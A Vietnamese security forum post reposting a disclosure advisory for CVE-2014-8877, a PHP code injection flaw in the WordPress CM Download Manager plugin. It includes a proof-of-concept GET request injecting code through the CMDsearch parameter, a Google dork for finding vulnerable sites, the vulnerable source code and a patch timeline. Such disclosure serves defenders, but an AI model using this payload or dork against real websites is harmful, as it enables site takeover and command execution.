Lỗi Bảo Mật Code Injection Trong Plugin Của WORDPRESS

magicvn

Internship/Fresher
Aug 10, 2014
22
1
0
Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
CVE: CVE-2014-8877
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and previous version
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Le Ngoc Phi - phi.n.le (at) itas (dot) vn [email concealed]
Credits to ITAS Team - www.itas.vn


:: DESCRITION ::


Lỗi bảo mật code injection được tìm thấy trong plugin CM Download Manager của wordpress. Lỗi này cho phép một kẻ tấn công vô danh chiếm quyền điều khiển toàn bộ website và có thể chạy các lệnh của hệ điều hành.


GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879
Connection: keep-alive

Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php
Vulnerable code: (Line: 130 -> 158)


Code:
public static function alterSearchQuery($search, $query)
{
if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
{
global $wpdb;
$search_term = $_GET['CMDsearch'];
if( !empty($search_term) )
{
$search = '';
$query->is_search = true;
// added slashes screw with quote grouping when done early, so done later
$search_term = stripslashes($search_term);
preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
$terms = array_map('_search_terms_tidy', $matches[0]);


$n = '%';
$searchand = ' AND ';
foreach((array) $terms as $term)
{
$term = esc_sql(like_escape($term));
$search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
}
add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
remove_filter('posts_request', 'relevanssi_prevent_default_request');
remove_filter('the_posts', 'relevanssi_query');
}
}
return $search;
}

:: SOLUTION ::
Update to version 2.0.4


:: DISCLOSURE ::
2014-11-08 initial vendor contact
2014-11-10 vendor response
2014-11-10 vendor confirmed
2014-11-11 vendor release patch
2014-11-14 public disclosure


:: REFERENCE ::
https://downloadsmanager.cminds.com/release-notes/
http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en
 
Last edited:

About us

  • Securityzone.vn là một trang web chuyên về an ninh mạng và công nghệ thông tin. Trang web này cung cấp các bài viết, tin tức, video, diễn đàn và các dịch vụ liên quan đến lĩnh vực này. Securityzone.vn là một trong những cộng đồng IT lớn và uy tín tại Việt Nam, thu hút nhiều người quan tâm và tham gia. Securityzone.vn cũng là nơi để các chuyên gia, nhà nghiên cứu, sinh viên và người yêu thích an ninh mạng có thể trao đổi, học hỏi và chia sẻ kiến thức, kinh nghiệm và giải pháp về các vấn đề bảo mật trong thời đại số.

Quick Navigation

User Menu